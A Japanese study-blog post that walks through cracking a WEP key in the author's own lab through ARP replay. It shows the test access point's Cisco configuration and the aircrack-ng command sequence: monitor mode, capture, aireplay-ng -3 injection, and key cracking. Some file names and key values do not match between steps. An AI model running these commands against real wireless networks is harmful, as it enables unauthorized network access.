家studyをつづって

IT技術やセキュリティで勉強したことをつづっています。

WEPのパスワード解析(ARP再送攻撃)

概要

前回の内容ではWEPで大量に通信している端末がある前提で、やり取りされる通信をひたすら収集し、収集したデータよりキーを解析する方法でした。
※前回は無線端末はYoutubeを視聴することで大量の通信を行っていました。

今回は無線端末はそこまで通信を行っていない状態から、通信を意図的に発生させてデータを収集するARP再送攻撃(ARP replay)を行います。
収集したデータからキーを解析することは前回の内容と同じですが、今回の内容は攻撃端末(Kali Linux)より、 意図的に通信を発生させることがポイントになります。

 

 

 

ARP再送攻撃について

f:id:iestudy:20210105222927p:plain

ARP再送攻撃のイメージ

https://www.soumu.go.jp/main_content/000519240.pdf

 

環境設定

無線APの設定

※設定箇所は太字です。

ap#terminal length 0
ap#sh run
Building configuration...

Current configuration : 1358 bytes
!
version 12.3
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
service password-encryption
!
hostname ap
!
enable secret 5 $1$H2QI$/SpgS6fOs8OufZ6RzhjQV1
!
ip subnet-zero
!
!
no aaa new-model
!
dot11 ssid test-wep
authentication open
guest-mode
!
!
!
username Cisco password 7 062506324F41
!
bridge irb
!
!
interface Dot11Radio0
no ip address
no ip route-cache
!
encryption key 1 size 40bit 7 FA1E467E23EA transmit-key
encryption mode wep mandatory
!
ssid test-wep
!
speed basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0 48.0 54.0
channel least-congested 2412 2417 2422 2427 2432 2437 2442 2447 2452 2457 2462 2467 2472
station-role root
bridge-group 1
bridge-group 1 subscriber-loop-control
bridge-group 1 block-unknown-source
no bridge-group 1 source-learning
no bridge-group 1 unicast-flooding
bridge-group 1 spanning-disabled
!
interface FastEthernet0
no ip address
no ip route-cache
duplex auto
speed auto
bridge-group 1
no bridge-group 1 source-learning
bridge-group 1 spanning-disabled
!
interface BVI1
ip address 192.168.1.252 255.255.255.0
no ip route-cache
!
ip http server
no ip http secure-server
ip http help-path http://www.cisco.com/warp/public/779/smbiz/prodconfig/help/eag
!
bridge 1 route ip
!
!
!
line con 0
line vty 0 4
login local
!
end

※コンフィグ上はWEPキーは暗号化されて「encryption key 1 size 40bit 7 1C3A6F2CBFBC transmit-key」のように表示されますが、実際設定時は「encryption key 1 size 40bit 0 1234567890 transmit-key」で設定しています。

 

実行結果

youtu.be

実行したコマンド

動画内で実行したコマンドは以下の通りです。

  • sudo airmon-ng start wlan0
  • sudo airodump-ng wlan0mon
  • sudo airodump-ng -c 8 --bssid 00:0F:8F:44:21:80 -w test-arp wlan0mon
  • sudo aireplay-ng -3 -b 00:0F:8F:44:21:80 -h b8:27:eb:a6:2e:cd wlan0mon
    「-3」はARP-Replay攻撃を行うモードです。
    その他にも認証要求を偽装する「--fakeauth」といったモードもあります。
  • sudo aircrack-ng test-fakeauth-01.cap

参考にさせていただいたサイト

↓はすごく勉強になりました。ありがとうございます。

https://www.soumu.go.jp/main_content/000519240.pdf

 

nippo-corporation.co.jp

cysec148.hatenablog.com

https://nekopippi.tumblr.com/post/166952580364/wep%E3%81%AE%E9%8D%B5%E5%BE%A9%E5%85%83

nekopippi.tumblr.com

medium.com